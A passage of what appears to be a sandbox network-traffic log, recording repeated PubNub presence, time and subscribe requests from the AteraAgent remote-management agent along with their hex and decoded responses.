                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                                          Host: ps.pndsn.com


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          19192.168.2.74999613.232.67.1984436216C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-11-24 10:17:07 UTC354OUTGET /v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497-2e94-42f0-b27c-add7e377a9d2/leave?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=28392dc4-8934-4e46-983c-9a044d541e87&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                                          Host: ps.pndsn.com
                                                                                                                                                                                                                                                                          2024-11-24 10:17:07 UTC322INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sun, 24 Nov 2024 10:17:07 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset="UTF-8"
                                                                                                                                                                                                                                                                          Content-Length: 74
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: OPTIONS, GET, POST
                                                                                                                                                                                                                                                                          Age: 0
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: *
                                                                                                                                                                                                                                                                          2024-11-24 10:17:07 UTC74INData Raw: 7b 22 73 74 61 74 75 73 22 3a 20 32 30 30 2c 20 22 6d 65 73 73 61 67 65 22 3a 20 22 4f 4b 22 2c 20 22 61 63 74 69 6f 6e 22 3a 20 22 6c 65 61 76 65 22 2c 20 22 73 65 72 76 69 63 65 22 3a 20 22 50 72 65 73 65 6e 63 65 22 7d
                                                                                                                                                                                                                                                                          Data Ascii: {"status": 200, "message": "OK", "action": "leave", "service": "Presence"}


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          20192.168.2.75000013.232.67.1984436216C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-11-24 10:17:07 UTC354OUTGET /v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497-2e94-42f0-b27c-add7e377a9d2/leave?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=5b5ff814-67d7-4f31-988a-3021f6dcca17&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                                          Host: ps.pndsn.com
                                                                                                                                                                                                                                                                          2024-11-24 10:17:08 UTC322INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sun, 24 Nov 2024 10:17:07 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset="UTF-8"
                                                                                                                                                                                                                                                                          Content-Length: 74
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: OPTIONS, GET, POST
                                                                                                                                                                                                                                                                          Age: 0
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: *
                                                                                                                                                                                                                                                                          2024-11-24 10:17:08 UTC74INData Raw: 7b 22 73 74 61 74 75 73 22 3a 20 32 30 30 2c 20 22 6d 65 73 73 61 67 65 22 3a 20 22 4f 4b 22 2c 20 22 61 63 74 69 6f 6e 22 3a 20 22 6c 65 61 76 65 22 2c 20 22 73 65 72 76 69 63 65 22 3a 20 22 50 72 65 73 65 6e 63 65 22 7d
                                                                                                                                                                                                                                                                          Data Ascii: {"status": 200, "message": "OK", "action": "leave", "service": "Presence"}


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          21192.168.2.75000913.232.67.1984436216C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-11-24 10:17:10 UTC159OUTGET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=bdd8f068-e461-49d2-bf76-5496f217f86a&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
                                                                                                                                                                                                                                                                          Host: ps.pndsn.com
                                                                                                                                                                                                                                                                          2024-11-24 10:17:10 UTC242INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sun, 24 Nov 2024 10:17:10 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset="UTF-8"
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Content-Length: 19
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: *
                                                                                                                                                                                                                                                                          2024-11-24 10:17:10 UTC19INData Raw: 5b 31 37 33 32 34 34 33 34 33 30 35 30 30 35 38 36 33 5d
                                                                                                                                                                                                                                                                          Data Ascii: [17324434305005863]


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          22192.168.2.75002213.232.67.1984436216C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-11-24 10:17:12 UTC340OUTGET /v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=101aac48-536c-4c37-8daf-2942910eb004&tt=0&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                                          Host: ps.pndsn.com
                                                                                                                                                                                                                                                                          2024-11-24 10:17:13 UTC277INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sun, 24 Nov 2024 10:17:12 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset="UTF-8"
                                                                                                                                                                                                                                                                          Content-Length: 45
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: GET
                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: *
                                                                                                                                                                                                                                                                          2024-11-24 10:17:13 UTC45INData Raw: 7b 22 74 22 3a 7b 22 74 22 3a 22 31 37 33 32 34 34 33 34 31 38 32 32 33 34 33 30 31 22 2c 22 72 22 3a 33 31 7d 2c 22 6d 22 3a 5b 5d 7d
                                                                                                                                                                                                                                                                          Data Ascii: {"t":{"t":"17324434182234301","r":31},"m":[]}


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          23192.168.2.75002313.232.67.1984436216C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-11-24 10:17:13 UTC358OUTGET /v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497-2e94-42f0-b27c-add7e377a9d2/heartbeat?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=78d657fe-250a-4458-990e-8db1804a62a6&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                                          Host: ps.pndsn.com
                                                                                                                                                                                                                                                                          2024-11-24 10:17:14 UTC322INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sun, 24 Nov 2024 10:17:13 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset="UTF-8"
                                                                                                                                                                                                                                                                          Content-Length: 55
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: OPTIONS, GET, POST
                                                                                                                                                                                                                                                                          Age: 0
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: *
                                                                                                                                                                                                                                                                          2024-11-24 10:17:14 UTC55INData Raw: 7b 22 73 74 61 74 75 73 22 3a 20 32 30 30 2c 20 22 6d 65 73 73 61 67 65 22 3a 20 22 4f 4b 22 2c 20 22 73 65 72 76 69 63 65 22 3a 20 22 50 72 65 73 65 6e 63 65 22 7d
                                                                                                                                                                                                                                                                          Data Ascii: {"status": 200, "message": "OK", "service": "Presence"}


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          24192.168.2.75003113.232.67.1984436216C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-11-24 10:17:15 UTC354OUTGET /v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497-2e94-42f0-b27c-add7e377a9d2/leave?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=c2794a63-4cce-452a-a323-b26bf4d17cfd&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                                          Host: ps.pndsn.com
                                                                                                                                                                                                                                                                          2024-11-24 10:17:16 UTC322INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sun, 24 Nov 2024 10:17:16 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset="UTF-8"
                                                                                                                                                                                                                                                                          Content-Length: 74
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: OPTIONS, GET, POST
                                                                                                                                                                                                                                                                          Age: 0
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: *
                                                                                                                                                                                                                                                                          2024-11-24 10:17:16 UTC74INData Raw: 7b 22 73 74 61 74 75 73 22 3a 20 32 30 30 2c 20 22 6d 65 73 73 61 67 65 22 3a 20 22 4f 4b 22 2c 20 22 61 63 74 69 6f 6e 22 3a 20 22 6c 65 61 76 65 22 2c 20 22 73 65 72 76 69 63 65 22 3a 20 22 50 72 65 73 65 6e 63 65 22 7d
                                                                                                                                                                                                                                                                          Data Ascii: {"status": 200, "message": "OK", "action": "leave", "service": "Presence"}


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          25192.168.2.75003413.232.67.1984436216C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-11-24 10:17:16 UTC159OUTGET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=3a79d35f-3aae-426f-91c8-7d16143c1d7a&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
                                                                                                                                                                                                                                                                          Host: ps.pndsn.com
                                                                                                                                                                                                                                                                          2024-11-24 10:17:16 UTC242INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sun, 24 Nov 2024 10:17:16 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset="UTF-8"
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Content-Length: 19
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: *
                                                                                                                                                                                                                                                                          2024-11-24 10:17:16 UTC19INData Raw: 5b 31 37 33 32 34 34 33 34 33 36 34 38 32 30 33 38 34 5d
                                                                                                                                                                                                                                                                          Data Ascii: [17324434364820384]


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          26192.168.2.75004113.232.67.1984436216C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-11-24 10:17:18 UTC362OUTGET /v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=ebb1f16f-c11d-4880-8816-8b8ea69a0ee1&tr=31&tt=17324434182234301&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                                          Host: ps.pndsn.com
                                                                                                                                                                                                                                                                          2024-11-24 10:17:19 UTC279INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sun, 24 Nov 2024 10:17:18 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset="UTF-8"
                                                                                                                                                                                                                                                                          Content-Length: 1864
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: GET
                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: *
                                                                                                                                                                                                                                                                          2024-11-24 10:17:19 UTC1864INData Raw: 7b 22 74 22 3a 7b 22 74 22 3a 22 31 37 33 32 34 34 33 34 33 35 31 35 33 31 31 32 39 22 2c 22 72 22 3a 33 31 7d 2c 22 6d 22 3a 5b 7b 22 61 22 3a 22 32 22 2c 22 66 22 3a 30 2c 22 69 22 3a 22 38 32 39 31 62 66 32 61 2d 33 31 61 32 2d 34 66 34 37 2d 38 62 64 36 2d 31 35 30 39 64 65 66 30 64 64 39 38 22 2c 22 70 22 3a 7b 22 74 22 3a 22 31 37 33 32 34 34 33 34 33 35 31 35 33 31 31 32 39 22 2c 22 72 22 3a 34 32 7d 2c 22 6b 22 3a 22 73 75 62 2d 63 2d 61 30 32 63 65 63 61 38 2d 61 39 35 38 2d 31 31 65 35 2d 62 64 38 63 2d 30 36 31 39 66 38 39 34 35 61 34 66 22 2c 22 63 22 3a 22 32 30 39 34 66 34 39 37 2d 32 65 39 34 2d 34 32 66 30 2d 62 32 37 63 2d 61 64 64 37 65 33 37 37 61 39 64 32 22 2c 22 64 22 3a 7b 22 43 6f 6d 6d 61 6e 64 49 64 22 3a 22 61 36 66 36 33 38 36
                                                                                                                                                                                                                                                                          Data Ascii: {"t":{"t":"17324434351531129","r":31},"m":[{"a":"2","f":0,"i":"8291bf2a-31a2-4f47-8bd6-1509def0dd98","p":{"t":"17324434351531129","r":42},"k":"sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f","c":"2094f497-2e94-42f0-b27c-add7e377a9d2","d":{"CommandId":"a6f6386


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          27192.168.2.75004413.232.67.1984436216C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-11-24 10:17:19 UTC358OUTGET /v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497-2e94-42f0-b27c-add7e377a9d2/heartbeat?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=f3cbab58-b709-46f1-9320-2a47ceb98572&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                                          Host: ps.pndsn.com
                                                                                                                                                                                                                                                                          2024-11-24 10:17:19 UTC322INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sun, 24 Nov 2024 10:17:19 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset="UTF-8"
                                                                                                                                                                                                                                                                          Content-Length: 55
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: OPTIONS, GET, POST
                                                                                                                                                                                                                                                                          Age: 0
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: *
                                                                                                                                                                                                                                                                          2024-11-24 10:17:19 UTC55INData Raw: 7b 22 73 74 61 74 75 73 22 3a 20 32 30 30 2c 20 22 6d 65 73 73 61 67 65 22 3a 20 22 4f 4b 22 2c 20 22 73 65 72 76 69 63 65 22 3a 20 22 50 72 65 73 65 6e 63 65 22 7d
                                                                                                                                                                                                                                                                          Data Ascii: {"status": 200, "message": "OK", "service": "Presence"}


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          28192.168.2.75005313.232.67.1984436216C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-11-24 10:17:21 UTC159OUTGET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=7cbe7b17-7f3f-4c8d-9d62-c19102ed6fde&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
                                                                                                                                                                                                                                                                          Host: ps.pndsn.com
                                                                                                                                                                                                                                                                          2024-11-24 10:17:22 UTC242INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sun, 24 Nov 2024 10:17:22 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset="UTF-8"
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Content-Length: 19
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: *
                                                                                                                                                                                                                                                                          2024-11-24 10:17:22 UTC19INData Raw: 5b 31 37 33 32 34 34 33 34 34 32 30 30 32 37 37 34 31 5d
                                                                                                                                                                                                                                                                          Data Ascii: [17324434420027741]


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          29192.168.2.75005713.232.67.1984436216C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-11-24 10:17:22 UTC358OUTGET /v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497-2e94-42f0-b27c-add7e377a9d2/heartbeat?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=e037a3ed-5082-482a-83de-1fb0a079a164&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                                          Host: ps.pndsn.com
                                                                                                                                                                                                                                                                          2024-11-24 10:17:22 UTC322INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sun, 24 Nov 2024 10:17:22 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset="UTF-8"
                                                                                                                                                                                                                                                                          Content-Length: 55
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: OPTIONS, GET, POST
                                                                                                                                                                                                                                                                          Age: 0
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: *
                                                                                                                                                                                                                                                                          2024-11-24 10:17:22 UTC55INData Raw: 7b 22 73 74 61 74 75 73 22 3a 20 32 30 30 2c 20 22 6d 65 73 73 61 67 65 22 3a 20 22 4f 4b 22 2c 20 22 73 65 72 76 69 63 65 22 3a 20 22 50 72 65 73 65 6e 63 65 22 7d
                                                                                                                                                                                                                                                                          Data Ascii: {"status": 200, "message": "OK", "service": "Presence"}


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          30192.168.2.75006113.232.67.1984436216C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-11-24 10:17:24 UTC362OUTGET /v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/2094f497-2e94-42f0-b27c-add7e377a9d2/0?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=5c21410a-40ef-453f-8c5e-f80e3c3a9e9b&tr=31&tt=17324434351531129&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                                          Host: ps.pndsn.com
                                                                                                                                                                                                                                                                          2024-11-24 10:17:25 UTC279INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sun, 24 Nov 2024 10:17:24 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset="UTF-8"
                                                                                                                                                                                                                                                                          Content-Length: 1854
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: GET
                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: *
                                                                                                                                                                                                                                                                          2024-11-24 10:17:25 UTC1854INData Raw: 7b 22 74 22 3a 7b 22 74 22 3a 22 31 37 33 32 34 34 33 34 34 31 35 32 33 36 38 37 34 22 2c 22 72 22 3a 33 31 7d 2c 22 6d 22 3a 5b 7b 22 61 22 3a 22 32 22 2c 22 66 22 3a 30 2c 22 69 22 3a 22 66 31 63 37 62 34 30 35 2d 63 64 61 38 2d 34 64 38 37 2d 61 30 66 62 2d 39 38 62 61 63 61 37 66 63 65 34 64 22 2c 22 70 22 3a 7b 22 74 22 3a 22 31 37 33 32 34 34 33 34 34 31 35 32 33 36 38 37 34 22 2c 22 72 22 3a 34 32 7d 2c 22 6b 22 3a 22 73 75 62 2d 63 2d 61 30 32 63 65 63 61 38 2d 61 39 35 38 2d 31 31 65 35 2d 62 64 38 63 2d 30 36 31 39 66 38 39 34 35 61 34 66 22 2c 22 63 22 3a 22 32 30 39 34 66 34 39 37 2d 32 65 39 34 2d 34 32 66 30 2d 62 32 37 63 2d 61 64 64 37 65 33 37 37 61 39 64 32 22 2c 22 64 22 3a 7b 22 43 6f 6d 6d 61 6e 64 49 64 22 3a 22 39 37 35 30 31 36 63
                                                                                                                                                                                                                                                                          Data Ascii: {"t":{"t":"17324434415236874","r":31},"m":[{"a":"2","f":0,"i":"f1c7b405-cda8-4d87-a0fb-98baca7fce4d","p":{"t":"17324434415236874","r":42},"k":"sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f","c":"2094f497-2e94-42f0-b27c-add7e377a9d2","d":{"CommandId":"975016c


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          31192.168.2.75006613.232.67.1984436216C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-11-24 10:17:25 UTC159OUTGET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=03f53b61-ad6b-486d-8509-b0e195faf765&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
                                                                                                                                                                                                                                                                          Host: ps.pndsn.com
                                                                                                                                                                                                                                                                          2024-11-24 10:17:26 UTC242INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sun, 24 Nov 2024 10:17:26 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset="UTF-8"
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Content-Length: 19
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: *
                                                                                                                                                                                                                                                                          2024-11-24 10:17:26 UTC19INData Raw: 5b 31 37 33 32 34 34 33 34 34 36 30 33 34 35 37 35 36 5d
                                                                                                                                                                                                                                                                          Data Ascii: [17324434460345756]


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          32192.168.2.75007813.232.67.1984436216C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-11-24 10:17:29 UTC159OUTGET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=21b072dc-59f8-4574-823e-a233b13880ce&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
                                                                                                                                                                                                                                                                          Host: ps.pndsn.com
                                                                                                                                                                                                                                                                          2024-11-24 10:17:30 UTC242INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sun, 24 Nov 2024 10:17:29 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset="UTF-8"
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Content-Length: 19
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: *
                                                                                                                                                                                                                                                                          2024-11-24 10:17:30 UTC19INData Raw: 5b 31 37 33 32 34 34 33 34 34 39 39 34 37 37 30 32 35 5d
                                                                                                                                                                                                                                                                          Data Ascii: [17324434499477025]


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          33192.168.2.75007313.232.67.1984436216C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-11-24 10:17:29 UTC358OUTGET /v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/2094f497-2e94-42f0-b27c-add7e377a9d2/heartbeat?heartbeat=93&pnsdk=NET45CSharp6.13.0.0&requestid=326c90ae-c5b0-4a74-aa79-71ed3289b5e6&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                                          Host: ps.pndsn.com
                                                                                                                                                                                                                                                                          2024-11-24 10:17:30 UTC322INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Sun, 24 Nov 2024 10:17:29 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset="UTF-8"
                                                                                                                                                                                                                                                                          Content-Length: 55
                                                                                                                                                                                                                                                                          Connection: close
